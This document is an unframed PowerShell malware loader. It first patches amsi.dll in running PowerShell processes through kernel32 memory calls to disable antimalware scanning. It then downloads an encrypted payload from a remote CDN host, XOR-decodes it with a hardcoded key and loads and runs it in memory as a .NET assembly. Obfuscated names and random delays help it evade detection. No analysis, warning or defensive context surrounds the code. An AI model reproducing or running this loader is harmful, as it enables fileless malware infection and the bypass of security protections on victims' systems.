$cliff = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId
if ($cliff) { Stop-Process -Id $cliff -Force }

Add-Type @"
using System;
using System.Runtime.InteropServices;
public class K {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr OpenProcess(uint a, bool i, int p);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w);
}
"@

function KJhbhb {
    Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
    $bridge = Get-Process -Name "powershell" -ErrorAction SilentlyContinue
    if (!$bridge) { exit 1 }
    
    foreach ($xenon in $bridge) {
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        $kitten = [K]::OpenProcess(0x001F0FFF, $thicket, $xenon.Id)
        $rune = $null
        $jungle = 0
        
        foreach ($jasper in $xenon.Modules) {
            if ($jasper.ModuleName -eq "amsi.dll") {
                $rune = $jasper.BaseAddress
                $jungle = $jasper.ModuleMemorySize
                break
            }
        }
        
        if (!$rune) { continue }
        
        $kite = [byte[]]::new(32)
        $hollow = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b)
        $petal = $null
        
        for ($vine = 0; $vine -le $jungle; $vine += 32) {
            $bloom = [IntPtr]::Zero
            [K]::ReadProcessMemory($kitten, [IntPtr]($rune.ToInt64() + $vine), $kite, 32, [ref]$bloom)
            $valley = $vale
            for ($zebra = 0; $zebra -lt 32; $zebra++) {
                if ($kite[$zebra] -ne $hollow[$zebra]) { $valley = $thicket; break }
            }
            if ($valley) { $petal = [IntPtr]($rune.ToInt64() + $vine); break }
        }
        
        if (!$petal) { continue }
        
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        $heath = 0
        [K]::VirtualProtectEx($kitten, $rune, 0x1000, 0x40, [ref]$heath)
        $violet = [byte[]]@(0x31,0xff,0x90)
        $ember = 0
        [K]::WriteProcessMemory($kitten, [IntPtr]($petal.ToInt64() + 0x1b), $violet, 3, [ref]$ember)
    }
}

KJhbhb

#ujhifsfiohdf
setx BUILD "Titan"
Start-Sleep -Milliseconds (Get-Random -Minimum 1500 -Maximum 2501)
$niche=(New-Object System.Net.WebClient).DownloadData("https://sdfas-cloud.b-cdn.net/mxeP0cUGM.dat")
$mead=[System.Text.Encoding]::UTF8.GetBytes("9mymJYWwd4zC")
$mist=New-Object byte[] $niche.Length
for($mirth=0
$mirth -lt $niche.Length
$mirth++){$mist[$mirth]=$niche[$mirth] -bxor $mead[$mirth%$mead.Length]}
$dawn=[System.Reflection.Assembly]::Load($mist)
if($dawn.EntryPoint){$dawn.EntryPoint.Invoke($null,@())}

[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()
#ujhifsfiohdf